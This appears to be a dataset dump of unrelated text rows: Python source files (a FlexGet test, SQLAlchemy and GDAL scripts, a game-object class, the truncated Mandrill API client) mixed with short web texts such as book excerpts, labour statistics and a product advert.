text
stringlengths
29
850k
from __future__ import unicode_literals, division, absolute_import from mock import patch, call from tests import FlexGetBase import flexget.plugins.input.betaseries_list def assert_mock_calls(expected_calls, mock_object): assert expected_calls == mock_object.mock_calls, "expecting calls %r, got %r instead" % \ (expected_calls, mock_object.mock_calls) def assert_series_count_in_db(expected_count): from flexget.plugins.filter.series import Series from flexget.manager import Session session = Session() actual_series_count = session.query(Series).count() assert expected_count == actual_series_count, "expecting %s series stored in db, got %s instead" % \ (expected_count, actual_series_count) class Test_import_series_betaseries_list(FlexGetBase): __yaml__ = """ tasks: test_no_members: configure_series: from: betaseries_list: username: user_foo password: passwd_foo api_key: api_key_foo test_with_one_members: configure_series: from: betaseries_list: username: user_foo password: passwd_foo api_key: api_key_foo members: - other_member_1 test_with_two_members: configure_series: from: betaseries_list: username: user_foo password: passwd_foo api_key: api_key_foo members: - other_member_1 - other_member_2 """ def setup(self): super(Test_import_series_betaseries_list, self).setup() ## mock create_token self.create_token_patcher = patch.object(flexget.plugins.input.betaseries_list, "create_token", return_value='token_foo') self.create_token_mock = self.create_token_patcher.start() ## mock query_series self.query_series_patcher = patch.object(flexget.plugins.input.betaseries_list, "query_series", return_value=[]) self.query_series_mock = self.query_series_patcher.start() def teardown(self): super(Test_import_series_betaseries_list, self).teardown() self.create_token_patcher.stop() self.query_series_patcher.stop() def test_no_members(self): # GIVEN self.query_series_mock.return_value = ["Breaking Bad", "Dexter"] # WHEN self.execute_task('test_no_members') # THEN assert_series_count_in_db(2) assert_mock_calls([call('api_key_foo', 'user_foo', 'passwd_foo')], self.create_token_mock) assert_mock_calls([call('api_key_foo', 'token_foo', 'user_foo')], self.query_series_mock) def test_with_one_members(self): # GIVEN self.query_series_mock.return_value = ["Breaking Bad", "Dexter", "The Simpsons"] # WHEN self.execute_task('test_with_one_members') # THEN assert_series_count_in_db(3) assert_mock_calls([call('api_key_foo', 'user_foo', 'passwd_foo')], self.create_token_mock) assert_mock_calls([call('api_key_foo', 'token_foo', 'other_member_1')], self.query_series_mock) def test_with_two_members(self): # GIVEN return_values_generator = (val for val in [ ["Family guy", "The Simpsons"], ["Breaking Bad", "Dexter", "The Simpsons"], ]) self.query_series_mock.side_effect = lambda *args: return_values_generator.next() # WHEN self.execute_task('test_with_two_members') # THEN assert_series_count_in_db(4) assert_mock_calls([call('api_key_foo', 'user_foo', 'passwd_foo')], self.create_token_mock) assert_mock_calls( [ call('api_key_foo', 'token_foo', 'other_member_1'), call('api_key_foo', 'token_foo', 'other_member_2') ], self.query_series_mock)
These are the last remaining works by Jean Delerens. Jean Delerens doesn’t have any exhibitions. Follow Jean Delerens to receive a notification as soon as new exhibitions are added.
# autocode.py # # Author(s): Christophe de Vienne <cdevienne@gmail.com> # Paul Johnson # # Based on autocode.py by Paul Johnson # (http://www.sqlalchemy.org/trac/wiki/UsageRecipes/AutoCode) # # Improvements over the original autocode.py: # * Takes arguments on the command line to select the dburl and # the output destination # * Replace a bunch of database specific types by generic ones. # This is incomplete as it feats only my needs for a mysql to mssql # database conversion. # * Output the indexes and ForeignKeyConstraints (including multi-columns # ones) correctly # # The resulting script is directly usable (ie import and create/use the tables) # with my testing database (a legacy mysql db with about 140+ tables, 140+ # foreign keys, 170+ indexes), after applying patches # http://www.sqlalchemy.org/trac/ticket/662 and # http://www.sqlalchemy.org/trac/ticket/663 on a 0.3.9 release. # from sqlalchemy import * from sqlalchemy.databases import information_schema import string import sys from optparse import OptionParser parser = OptionParser("usage: %prog [options] dburl") parser.add_option('--output', '-o', action='store', dest='output', metavar='FILE', default='stdout', help='Write the result into FILE (default "stdout")') (options, args) = parser.parse_args() if len(args) != 1: parser.error('Wrong number or arguments') dburl = engine.url.make_url(args[0]) db = create_engine(dburl) metadata = BoundMetaData(db) if options.output == 'stdout': output = sys.stdout else: output = open(options.output, 'w') def textclause_repr(self): return 'text(%s)' % repr(self.text) def table_repr(self): return "Table(%s)" % ",\n ".join( [repr(self.name)] + [repr(self.metadata)] + [repr(x) for x in self.columns] + [repr(x) for x in self.constraints if not isinstance(x, PrimaryKeyConstraint)] ) def column_repr(self): kwarg = [] if self.key != self.name: kwarg.append('key') if self._primary_key: kwarg.append('primary_key') if not self.nullable: kwarg.append('nullable') if self.onupdate: kwarg.append('onupdate') if self.default: kwarg.append('default') return "Column(%s)" % ', '.join( [repr(self.name)] + [repr(self.type)] + [repr(x) for x in self.constraints] + ["%s=%s" % (k, repr(getattr(self, k))) for k in kwarg] ) def foreignkeyconstraint_repr(self): return "ForeignKeyConstraint(%s)" % ', '.join( [ repr([x.parent.name for x in self.elements]), repr([x._get_colspec() for x in self.elements]), 'name=' + repr(self.name) ] ) def repr_index(index, tvarname): return "Index(%s)" % ", ".join( [repr(index.name)] + ["%s.c.%s" % (tvarname, c.name) for c in index.columns] + ['unique=' + repr(index.unique)]) sql._TextClause.__repr__ = textclause_repr schema.Table.__repr__ = table_repr schema.Column.__repr__ = column_repr schema.ForeignKeyConstraint.__repr__ = foreignkeyconstraint_repr sql = select([information_schema.tables.c.table_name, information_schema.tables.c.table_schema], information_schema.tables.c.table_schema==dburl.database) output.write("""from sqlalchemy import * metadata = MetaData() """) tname_list = [] for tname,schema in db.execute(sql): if schema != dburl.database: continue tname_list.append(tname) tbl = Table(tname, metadata, schema=schema, autoload=True) code = repr(tbl) code = code.replace('BoundMetaData()', 'metadata') code = code.replace('MSChar', 'CHAR') code = code.replace('MSSmallInteger(length=1)', 'Boolean()') code = code.replace('MSSmallInteger', 'SmallInteger') code = code.replace('MSDateTime', 'DateTime') code = code.replace('MSMediumText', 'TEXT') code = code.replace('MSDouble', 'Numeric') code = code.replace('MSMediumText', 'TEXT') code = code.replace('MSLongBlob', 'TEXT') code = code.replace('MSString', 'String') code = code.replace('MSDate', 'Date') code = code.replace('MSTime', 'DateTime') code = code.replace('MSInteger', 'Integer') code = code.replace('MSDecimal', 'Numeric') code = code.replace('MSEnum', 'Integer') caps = string.capitalize(tname) indexes = "\n".join( [repr_index(index, tname) for index in tbl.indexes]) output.write( """ %s = %s %s """ % (tname, code, indexes)) # vim: expandtab tabstop=4 shiftwidth=4:
This is the fifth post from an 8-week cycle drawing excerpts from my book, The Monk’s Cell: Ritual and Knowledge in American Contemplative Christianity (Oxford University Press, 2018). Chapters five, six, and seven work together as a kind of Triduum (the three-day rite of Easter, beginning with Maundy Thursday, following with Good Friday, and concluding with the Easter Vigil). Continuing with the series of excerpts from The Monk’s Cell: Ritual and Knowledge in American Contemplative Christianity (Oxford University Press, 2018), the fourth chapter, Gate, describes the charismatic appeal of teachers and diversity within the American contemplative Christianity movement. Exploring the limits of variability in this dynamic, open-minded movement, the chapter compares the distinctive ethos - penitence and eros - of monastic and Wisdom rites for Holy Week. The Monk’s Cell’s chapters are modeled on an architectural metaphor for “deepening into the divine,” similar to Teresa of Ávila’s Interior Castle. The first chapter, Portico, describes how longing for the divine draws people to contemplative Christianity. Our Kamloops contemplative group has evolved through several incarnations over the years. Initially we were simply four people in our local parish who were getting together weekly to share our stories and to “pray”. That was some twenty-five years ago. A Christmas farewell from the administrator, Miranda Harvey.
#!/usr/bin/python # Copyright 2015 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """This script outputs the filenames of the files that are in the "packages/" subdir of the given directory, relative to that directory.""" import argparse import os import sys def main(target_directory): os.chdir(target_directory) for root, _, files in os.walk("packages", followlinks=True): for f in files: print os.path.join(root, f) if __name__ == '__main__': parser = argparse.ArgumentParser( description="List filenames of files in the packages/ subdir of the " "given directory.") parser.add_argument("--target-directory", dest="target_directory", metavar="<target-directory>", type=str, required=True, help="The target directory, specified relative to this " "directory.") args = parser.parse_args() sys.exit(main(args.target_directory))
proportion of self-employed persons among foreigners is significantly higher than the proportion of all sole traders in the population. Despite the influx of foreigners, however, employment growth is likely to slow down this year and the next. Nevertheless, foreigners will remain an important source of the labour force even in the future. to do. Companies often use foreign workers for one-off or temporary works. It may be in the situation when an enterprise has more orders, needs help with seasonal works or its own employees are ill. Companies often seek foreign workers through work agencies, which are able to deliver the appropriate staff very quickly and only for the period for which the company needs. This brings higher flexibility to employers and the possibility of how to deal with labor shortages for certain work or a short period. 754,000 in Germany, this is an insignificant number. increase in the number of citizenships by 5,100 in 2014, the highest yearly increase since 2000. Still, the Czech Republic ranks 24th in the number of citizenships granted in the ranging countries of the euro area. comparison with developed countries of the euro area, the share of immigrants in the total population is still significantly lower; for example, in Austria foreigners represent 14% of the total population and in neighbouring Germany 10%. Most of the foreigners residing long term in the Czech Republic also work there. In 2015, 87% of the total number of foreigners either worked there on the basis of a trade licence or an employment contract. The number of self-employed people is relatively stable; on the other hand, the number of employees is gradually rising (323,000 in 2015). This follows the statistics from the labour offices, the number of valid trade licences, the number of permits issued to foreigners from third countries, and Green and Blue Cards (Blue Cards enable long-term residence for the purpose of highly qualified employment).
#!/usr/bin/env python # Copyright 2014 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # This is a complete rewrite of a file licensed as follows: # # Copyright (c) 2007, Frank Warmerdam <warmerdam@pobox.com> # # Permission is hereby granted, free of charge, to any person obtaining a # copy of this software and associated documentation files (the "Software"), # to deal in the Software without restriction, including without limitation # the rights to use, copy, modify, merge, publish, distribute, sublicense, # and/or sell copies of the Software, and to permit persons to whom the # Software is furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included # in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS # OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL # THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING # FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER # DEALINGS IN THE SOFTWARE. """Test geolocation warper. Rewrite of: http://trac.osgeo.org/gdal/browser/trunk/autotest/gcore/geoloc.py """ import contextlib import os from osgeo import gdal import unittest from autotest2.gcore import gcore_util from autotest2.gdrivers import gdrivers_util EXT = '.vrt' @contextlib.contextmanager def PushDir(path): orig_path = os.getcwd() os.chdir(path) yield os.chdir(orig_path) @gdrivers_util.SkipIfDriverMissing(gdrivers_util.VRT_DRIVER) @gdrivers_util.SkipIfDriverMissing(gdrivers_util.GTIFF_DRIVER) class GeolocTest(gdrivers_util.DriverTestCase): def setUp(self): super(GeolocTest, self).setUp(gdrivers_util.VRT_DRIVER, EXT) def testGeoloc01WarpSst(self): filepath = gcore_util.GetTestFilePath('warpsst.vrt') with PushDir(os.path.dirname(filepath)): self.CheckOpen(filepath) self.CheckGeoTransform((-90.30271148, 0.15466423, 0, 33.87552642, 0, -0.15466423)) # TODO(schwehr): The changing checksum of the band with GDAL updates implies # that this test is brittle and needs to be reworked. self.CheckBand(1, 62319, gdal.GDT_Int16) if __name__ == '__main__': unittest.main()
When a Kasie West book is announced or released we know two things immediately. One, that we need it. And two, that it’s going to be amazing. Lucky in love fits into both of those categories perfectly. We guarantee you’re going to love it too. One of the things that Kasie does best is give you a cast of characters that you fall for quickly and don’t want to leave when their story ends. Maddie and Seth are no exception. You will laugh with them, cheer them on, and swoon for their romance. Kasie West writes YA. She eats Junior Mints. Sometimes she goes crazy and does both at the same time. Her novels are: PIVOT POINT and its sequel SPLIT SECOND. And her contemporary novels: THE DISTANCE BETWEEN US, ON THE FENCE, THE FILL-IN BOYFRIEND, PS I LIKE YOU, and BY YOUR SIDE. Her agent is the talented and funny Michelle Wolfson. She graduated from Fresno State University with a BA degree that has nothing to do with writing. She earned her masters in Junior Mint eating (which is awarded after eating your millionth King Size box… she’s now working on her PhD). She loves sappy alternative rock ballads and reading way past her bedtime.
from components.component import valid_components class GameObject(object): def __init__(self): self.components = {} self.observers = {} self.responders = {} def copy_to(self, new_game_object): for component in self.components.values(): new_game_object.register_component(component.copy()) return new_game_object def get_component(self, component_name): return self.components.get(component_name, None) def update(self): for component in self.components.values(): component.update() def transmit_message(self, sender, message_type, **kwargs): if message_type in self.observers: for observer, func in self.observers[message_type]: if observer != sender: func(**kwargs) def transmit_query(self, sender, query_type, **kwargs): responses = [] if query_type in self.responders: for responder, func in self.responders[query_type]: if responder != sender: responses.append(func(**kwargs)) return responses def register_observer(self, observer, message_type, func): if message_type not in self.observers: self.observers[message_type] = [] if func not in self.observers[message_type]: self.observers[message_type].append((observer, func)) def register_query_responder(self, responder, query_type, func): if query_type not in self.responders: self.responders[query_type] = [] if func not in self.responders[query_type]: self.responders[query_type].append((responder, func)) def register_component(self, component): if component.NAME in self.components: self.unregister_component(component) self.components[component.NAME] = component component.on_register(self) def unregister_component(self, component): if component.NAME in self.components: component.on_unregister() del self.components[component.NAME] def __getattr__(self, item): if item in valid_components: component = self.get_component(item) if component: return component return NoneVoid() raise AttributeError() class NoneVoid(object): """ This class's only purpose is to Falsify any other calls make to get attributes from it. It allows us to duck type into components a little easier. """ def __getattr__(self, item): return None def __bool__(self): return False
Know a Keene? What are his siblings named? Keene is an English surname, from an Old English personal name meaning "proud/brave." It is separate in origin from the Irish Gaelic name Cian/Keane ("ancient/legendary"). How does Keene sound to you?
#!/usr/bin/env python import numpy as np import pylab import yaml stream = file('time.yaml', 'r') TIME_LOG = yaml.load(stream) stream.close() time2 = TIME_LOG[1] time4 = TIME_LOG[2] time6 = TIME_LOG[3] time8 = TIME_LOG[4] time10 = TIME_LOG[5] stream = file('config.yaml', 'r') CONFIG_LOG = yaml.load(stream) stream.close() for i in range(0, len(CONFIG_LOG)): for j in range(0, len(CONFIG_LOG[i])): for k in range(0, len(CONFIG_LOG[i][j])): if np.isnan(CONFIG_LOG[i][j][k]): print "Config NaN found and replaced" CONFIG_LOG[i][j][k] = 0 config2 = np.asanyarray(CONFIG_LOG[1]) config4 = np.asanyarray(CONFIG_LOG[2]) config6 = np.asanyarray(CONFIG_LOG[3]) config8 = np.asanyarray(CONFIG_LOG[4]) config10 = np.asanyarray(CONFIG_LOG[5]) stream = file('command.yaml', 'r') COMMAND_LOG = yaml.load(stream) stream.close() for i in range(0, len(COMMAND_LOG)): for j in range(0, len(COMMAND_LOG[i])): for k in range(0, len(COMMAND_LOG[i][j])): if np.isnan(COMMAND_LOG[i][j][k]): print "Command NaN found and replaced" COMMAND_LOG[i][j][k] = 0 command2 = np.asanyarray(COMMAND_LOG[1]) command4 = np.asanyarray(COMMAND_LOG[2]) command6 = np.asanyarray(COMMAND_LOG[3]) command8 = np.asanyarray(COMMAND_LOG[4]) command10 = np.asanyarray(COMMAND_LOG[5]) #roygbiv ax1 = pylab.subplot(211) line2, = pylab.plot(time2, config2[:,0]) line4, = pylab.plot(time4, config4[:,0]) line6, = pylab.plot(time6, config6[:,0]) line8, = pylab.plot(time8, config8[:,0]) line10, = pylab.plot(time10, config10[:,0]) pylab.axvline(x=1.0, linewidth=3, linestyle="--", color="gray") pylab.setp(line2, linewidth=3, color='red') pylab.setp(line4, linewidth=3, color='orange') pylab.setp(line6, linewidth=3, color='yellow') pylab.setp(line8, linewidth=3, color='green') pylab.setp(line10, linewidth=3, color='blue') pylab.legend([line2, line4, line6, line8, line10], ["Trust 0.2", "Trust 0.4", "Trust 0.6", "Trust 0.8", "Trust 1.0"]) pylab.title("Feedback Controller Input Blended with User Input at Different Levels of Trust") pylab.ylabel("Base Joint Angle about X-axis (radians)") ax2 = pylab.subplot(212, sharex=ax1) line2, = pylab.plot(time2, config2[:,1]) line4, = pylab.plot(time4, config4[:,1]) line6, = pylab.plot(time6, config6[:,1]) line8, = pylab.plot(time8, config8[:,1]) line10, = pylab.plot(time10, config10[:,1]) pylab.axvline(x=1.0, linewidth=3, linestyle="--", color="gray") pylab.setp(line2, linewidth=3, color='red') pylab.setp(line4, linewidth=3, color='orange') pylab.setp(line6, linewidth=3, color='yellow') pylab.setp(line8, linewidth=3, color='green') pylab.setp(line10, linewidth=3, color='blue') pylab.legend([line2, line4, line6, line8, line10], ["Trust 0.2", "Trust 0.4", "Trust 0.6", "Trust 0.8", "Trust 1.0"]) pylab.xlabel("Time (sec)") pylab.ylabel("Base Joint Angle about Y-axis (radians)") pylab.show()
Make it comfortable and feel more homely whenever a dry toilet seat is there during your private time. This seat coverplace a natural barrier between your skin and the toilet seat helps reduce the passing of germs, bacteria, and viruses to keep you and your children healthier; especially in dirty public restrooms and bathrooms when you are travelling with families. The surface of the toilet seat cover is full of tiny particles to keep it from sticking on your skin, make you feel dry and comfortable. It is made from premium polyolefin material which contains no harmful chemicals, antibacterial and waterproof. The common toilet seat covers adopt simple lay on design, they are easy to slide that may cause your skin still contact with germs, but ours used set-into design, fit over a universal toilet seat. It allows covering the seat fully and will not slide easily, you can be rest assured to use it in safety.
import requests, os.path, logging, sys, time try: import ujson as json except ImportError: try: import simplejson as json except ImportError: import json class Error(Exception): pass class ValidationError(Error): pass class InvalidKeyError(Error): pass class PaymentRequiredError(Error): pass class UnknownSubaccountError(Error): pass class UnknownTemplateError(Error): pass class ServiceUnavailableError(Error): pass class UnknownMessageError(Error): pass class InvalidTagNameError(Error): pass class InvalidRejectError(Error): pass class UnknownSenderError(Error): pass class UnknownUrlError(Error): pass class UnknownTrackingDomainError(Error): pass class InvalidTemplateError(Error): pass class UnknownWebhookError(Error): pass class UnknownInboundDomainError(Error): pass class UnknownInboundRouteError(Error): pass class UnknownExportError(Error): pass class IPProvisionLimitError(Error): pass class UnknownPoolError(Error): pass class NoSendingHistoryError(Error): pass class PoorReputationError(Error): pass class UnknownIPError(Error): pass class InvalidEmptyDefaultPoolError(Error): pass class InvalidDeleteDefaultPoolError(Error): pass class InvalidDeleteNonEmptyPoolError(Error): pass class InvalidCustomDNSError(Error): pass class InvalidCustomDNSPendingError(Error): pass class MetadataFieldLimitError(Error): pass class UnknownMetadataFieldError(Error): pass ROOT = 'https://mandrillapp.com/api/1.0/' ERROR_MAP = { 'ValidationError': ValidationError, 'Invalid_Key': InvalidKeyError, 'PaymentRequired': PaymentRequiredError, 'Unknown_Subaccount': UnknownSubaccountError, 'Unknown_Template': UnknownTemplateError, 'ServiceUnavailable': ServiceUnavailableError, 'Unknown_Message': UnknownMessageError, 'Invalid_Tag_Name': InvalidTagNameError, 'Invalid_Reject': InvalidRejectError, 'Unknown_Sender': UnknownSenderError, 'Unknown_Url': UnknownUrlError, 'Unknown_TrackingDomain': UnknownTrackingDomainError, 'Invalid_Template': InvalidTemplateError, 'Unknown_Webhook': UnknownWebhookError, 'Unknown_InboundDomain': UnknownInboundDomainError, 'Unknown_InboundRoute': UnknownInboundRouteError, 'Unknown_Export': UnknownExportError, 'IP_ProvisionLimit': IPProvisionLimitError, 'Unknown_Pool': UnknownPoolError, 'NoSendingHistory': NoSendingHistoryError, 'PoorReputation': PoorReputationError, 'Unknown_IP': UnknownIPError, 'Invalid_EmptyDefaultPool': InvalidEmptyDefaultPoolError, 'Invalid_DeleteDefaultPool': InvalidDeleteDefaultPoolError, 'Invalid_DeleteNonEmptyPool': InvalidDeleteNonEmptyPoolError, 'Invalid_CustomDNS': InvalidCustomDNSError, 'Invalid_CustomDNSPending': InvalidCustomDNSPendingError, 'Metadata_FieldLimit': MetadataFieldLimitError, 'Unknown_MetadataField': UnknownMetadataFieldError } logger = logging.getLogger('mandrill') logger.setLevel(logging.INFO) logger.addHandler(logging.StreamHandler(sys.stderr)) class Mandrill(object): def __init__(self, apikey=None, debug=False): '''Initialize the API client Args: apikey (str|None): provide your Mandrill API key. If this is left as None, we will attempt to get the API key from the following locations:: - MANDRILL_APIKEY in the environment vars - ~/.mandrill.key for the user executing the script - /etc/mandrill.key debug (bool): set to True to log all the request and response information to the "mandrill" logger at the INFO level. When set to false, it will log at the DEBUG level. By default it will write log entries to STDERR ''' self.session = requests.session() if debug: self.level = logging.INFO else: self.level = logging.DEBUG self.last_request = None if apikey is None: if 'MANDRILL_APIKEY' in os.environ: apikey = os.environ['MANDRILL_APIKEY'] else: apikey = self.read_configs() if apikey is None: raise Error('You must provide a Mandrill API key') self.apikey = apikey self.templates = Templates(self) self.exports = Exports(self) self.users = Users(self) self.rejects = Rejects(self) self.inbound = Inbound(self) self.tags = Tags(self) self.messages = Messages(self) self.whitelists = Whitelists(self) self.ips = Ips(self) self.internal = Internal(self) self.subaccounts = Subaccounts(self) self.urls = Urls(self) self.webhooks = Webhooks(self) self.senders = Senders(self) self.metadata = Metadata(self) def call(self, url, params=None): '''Actually make the API call with the given params - this should only be called by the namespace methods - use the helpers in regular usage like m.tags.list()''' if params is None: params = {} params['key'] = self.apikey params = json.dumps(params) self.log('POST to %s%s.json: %s' % (ROOT, url, params)) start = time.time() r = self.session.post('%s%s.json' % (ROOT, url), data=params, headers={'content-type': 'application/json', 'user-agent': 'Mandrill-Python/1.0.55'}) try: remote_addr = r.raw._original_response.fp._sock.getpeername() # grab the remote_addr before grabbing the text since the socket will go away except: remote_addr = (None, None) #we use two private fields when getting the remote_addr, so be a little robust against errors response_body = r.text complete_time = time.time() - start self.log('Received %s in %.2fms: %s' % (r.status_code, complete_time * 1000, r.text)) self.last_request = {'url': url, 'request_body': params, 'response_body': r.text, 'remote_addr': remote_addr, 'response': r, 'time': complete_time} result = json.loads(response_body) if r.status_code != requests.codes.ok: raise self.cast_error(result) return result def cast_error(self, result): '''Take a result representing an error and cast it to a specific exception if possible (use a generic mandrill.Error exception for unknown cases)''' if not 'status' in result or result['status'] != 'error' or not 'name' in result: raise Error('We received an unexpected error: %r' % result) if result['name'] in ERROR_MAP: return ERROR_MAP[result['name']](result['message']) return Error(result['message']) def read_configs(self): '''Try to read the API key from a series of files if it's not provided in code''' paths = [os.path.expanduser('~/.mandrill.key'), '/etc/mandrill.key'] for path in paths: try: f = open(path, 'r') apikey = f.read().strip() f.close() if apikey != '': return apikey except: pass return None def log(self, *args, **kwargs): '''Proxy access to the mandrill logger, changing the level based on the debug setting''' logger.log(self.level, *args, **kwargs) def __repr__(self): return '<Mandrill %s>' % self.apikey class Templates(object): def __init__(self, master): self.master = master def add(self, name, from_email=None, from_name=None, subject=None, code=None, text=None, publish=True, labels=[]): """Add a new template Args: name (string): the name for the new template - must be unique from_email (string): a default sending address for emails sent using this template from_name (string): a default from name to be used subject (string): a default subject line to be used code (string): the HTML code for the template with mc:edit attributes for the editable elements text (string): a default text part to be used when sending with this template publish (boolean): set to false to add a draft template without publishing labels (array): an optional array of up to 10 labels to use for filtering templates:: labels[] (string): a single label Returns: struct. the information saved about the new template:: slug (string): the immutable unique code name of the template name (string): the name of the template labels (array): the list of labels applied to the template:: labels[] (string): a single label code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version subject (string): the subject line of the template, if provided - draft version from_email (string): the default sender address for the template, if provided - draft version from_name (string): the default sender from name for the template, if provided - draft version text (string): the default text part of messages sent with the template, if provided - draft version publish_name (string): the same as the template name - kept as a separate field for backwards compatibility publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published publish_subject (string): the subject line of the template, if provided publish_from_email (string): the default sender address for the template, if provided publish_from_name (string): the default sender from name for the template, if provided publish_text (string): the default text part of messages sent with the template, if provided published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: InvalidTemplateError: The given template name already exists or contains invalid characters InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'name': name, 'from_email': from_email, 'from_name': from_name, 'subject': subject, 'code': code, 'text': text, 'publish': publish, 'labels': labels} return self.master.call('templates/add', _params) def info(self, name): """Get the information for an existing template Args: name (string): the immutable name of an existing template Returns: struct. the requested template information:: slug (string): the immutable unique code name of the template name (string): the name of the template labels (array): the list of labels applied to the template:: labels[] (string): a single label code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version subject (string): the subject line of the template, if provided - draft version from_email (string): the default sender address for the template, if provided - draft version from_name (string): the default sender from name for the template, if provided - draft version text (string): the default text part of messages sent with the template, if provided - draft version publish_name (string): the same as the template name - kept as a separate field for backwards compatibility publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published publish_subject (string): the subject line of the template, if provided publish_from_email (string): the default sender address for the template, if provided publish_from_name (string): the default sender from name for the template, if provided publish_text (string): the default text part of messages sent with the template, if provided published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: UnknownTemplateError: The requested template does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'name': name} return self.master.call('templates/info', _params) def update(self, name, from_email=None, from_name=None, subject=None, code=None, text=None, publish=True, labels=None): """Update the code for an existing template. If null is provided for any fields, the values will remain unchanged. Args: name (string): the immutable name of an existing template from_email (string): the new default sending address from_name (string): the new default from name subject (string): the new default subject line code (string): the new code for the template text (string): the new default text part to be used publish (boolean): set to false to update the draft version of the template without publishing labels (array): an optional array of up to 10 labels to use for filtering templates:: labels[] (string): a single label Returns: struct. the template that was updated:: slug (string): the immutable unique code name of the template name (string): the name of the template labels (array): the list of labels applied to the template:: labels[] (string): a single label code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version subject (string): the subject line of the template, if provided - draft version from_email (string): the default sender address for the template, if provided - draft version from_name (string): the default sender from name for the template, if provided - draft version text (string): the default text part of messages sent with the template, if provided - draft version publish_name (string): the same as the template name - kept as a separate field for backwards compatibility publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published publish_subject (string): the subject line of the template, if provided publish_from_email (string): the default sender address for the template, if provided publish_from_name (string): the default sender from name for the template, if provided publish_text (string): the default text part of messages sent with the template, if provided published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: UnknownTemplateError: The requested template does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'name': name, 'from_email': from_email, 'from_name': from_name, 'subject': subject, 'code': code, 'text': text, 'publish': publish, 'labels': labels} return self.master.call('templates/update', _params) def publish(self, name): """Publish the content for the template. Any new messages sent using this template will start using the content that was previously in draft. Args: name (string): the immutable name of an existing template Returns: struct. the template that was published:: slug (string): the immutable unique code name of the template name (string): the name of the template labels (array): the list of labels applied to the template:: labels[] (string): a single label code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version subject (string): the subject line of the template, if provided - draft version from_email (string): the default sender address for the template, if provided - draft version from_name (string): the default sender from name for the template, if provided - draft version text (string): the default text part of messages sent with the template, if provided - draft version publish_name (string): the same as the template name - kept as a separate field for backwards compatibility publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published publish_subject (string): the subject line of the template, if provided publish_from_email (string): the default sender address for the template, if provided publish_from_name (string): the default sender from name for the template, if provided publish_text (string): the default text part of messages sent with the template, if provided published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: UnknownTemplateError: The requested template does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'name': name} return self.master.call('templates/publish', _params) def delete(self, name): """Delete a template Args: name (string): the immutable name of an existing template Returns: struct. the template that was deleted:: slug (string): the immutable unique code name of the template name (string): the name of the template labels (array): the list of labels applied to the template:: labels[] (string): a single label code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements - draft version subject (string): the subject line of the template, if provided - draft version from_email (string): the default sender address for the template, if provided - draft version from_name (string): the default sender from name for the template, if provided - draft version text (string): the default text part of messages sent with the template, if provided - draft version publish_name (string): the same as the template name - kept as a separate field for backwards compatibility publish_code (string): the full HTML code of the template, with mc:edit attributes marking the editable elements that are available as published, if it has been published publish_subject (string): the subject line of the template, if provided publish_from_email (string): the default sender address for the template, if provided publish_from_name (string): the default sender from name for the template, if provided publish_text (string): the default text part of messages sent with the template, if provided published_at (string): the date and time the template was last published as a UTC string in YYYY-MM-DD HH:MM:SS format, or null if it has not been published created_at (string): the date and time the template was first created as a UTC string in YYYY-MM-DD HH:MM:SS format updated_at (string): the date and time the template was last modified as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: UnknownTemplateError: The requested template does not exist InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'name': name} return self.master.call('templates/delete', _params) def list(self, label=None): """Return a list of all the templates available to this user Args: label (string): an optional label to filter the templates Returns: array. an array of structs with information about each template:: [] (struct): the information on each template in the account:: [].slug (string): the immutable unique code name of the template [].name (string): the name of the template [].labels 